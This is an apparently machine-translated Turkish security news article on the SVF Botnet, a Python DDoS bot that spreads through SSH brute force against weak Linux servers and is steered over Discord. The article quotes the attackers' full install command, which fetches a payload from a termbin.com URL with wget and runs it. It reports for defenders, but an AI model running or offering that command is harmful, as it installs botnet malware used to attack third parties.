Siber güvenlik araştırmacıları, Python tabanlı dağıtılmış bir hizmet reddi kötü amaçlı yazılım olan SVF Botnet’i dağıtmak için SSH Brute Force saldırıları yoluyla kötü yönetilen Linux sunucularını hedefleyen sofistike bir saldırı kampanyası ortaya çıkardılar.
Kötü amaçlı yazılım, komuta ve kontrol altyapısı olarak anlaşmazlıktan yararlanır ve hedeflenen sistemlere karşı saldırı yeteneklerini yükseltmek için birden fazla proxy sunucusu kullanır.
SVF botnet, geleneksel kaba kuvvet tekniklerini modern iletişim platformlarıyla birleştirerek DDOS saldırı araçlarında dikkate değer bir evrimi temsil eder.
Tehdit aktörleri, zayıf SSH kimlik bilgileriyle Linux sunucularını kullanıyor, uzlaşmış sistemleri hem katman 7 HTTP sellerini ve kurbanlara karşı katman 4 UDP selini başlatabilecek güçlü DDOS silahlarına dönüştürüyor.
ASEC analistleri, bu kötü amaçlı yazılımları, sözlük ve kaba kuvvet saldırıları kullanarak SSH hizmetlerinden ödün vermek için çok sayıda denemeyi tespit eden Honeypot İzleme Sistemleri aracılığıyla tanımladılar.
.webp)
Araştırmacılar, SVF botunun, önceki macun tabanlı botnet işleyişini bıraktıktan sonra eğlence amaçları için “SVF ekibi” tarafından yaratıldığını gözlemlediler.
Saldırı kampanyası, özellikle varsayılan veya zayıf kimlik doğrulama mekanizmaları ile internete maruz kalan sistemler, yetersiz güvence altına alınan Linux altyapısıyla karşı karşıya olan sürekli tehdidi göstermektedir.
Enfeksiyon mekanizması ve dağıtım
SVF Botnet’in kurulum süreci, tek bir komut yürütme yoluyla sofistike otomasyonu sergiliyor. Başarılı SSH uzlaşması üzerine, saldırganlar kötü amaçlı yazılımları aşağıdakileri kullanarak konuşlandırır: python -m venv venv; source ./venv/bin/activate; pip install discord discord.py requests aiohttp lxml; wget https://termbin.com/4ccx -O main.py; python main.py -s 5
Bu komut bir Python sanal ortam oluşturur, uyumsuzluk kütüphaneleri de dahil olmak üzere gerekli bağımlılıkları yükler, kötü amaçlı yazılım yükünü indirir ve sunucu grubu tanımlayıcısı “5” ile yürütür.
Kötü amaçlı yazılım, gömülü bot jetonları kullanarak anlaşmazlık sunucuları ile kimlik doğrulaması yapar ve hemen webhooks aracılığıyla başarılı enfeksiyonlar rapor ederek gerçek zamanlı botnet yönetimini ve sonraki DDOS kampanyaları için koordinasyon sağlar.
Tespiti artırın, uyarı yorgunluğunu azaltın, yanıtı hızlandırın; Güvenlik ekipleri için inşa edilmiş etkileşimli bir sanal alan ile hepsi -> Herhangi bir deneyin.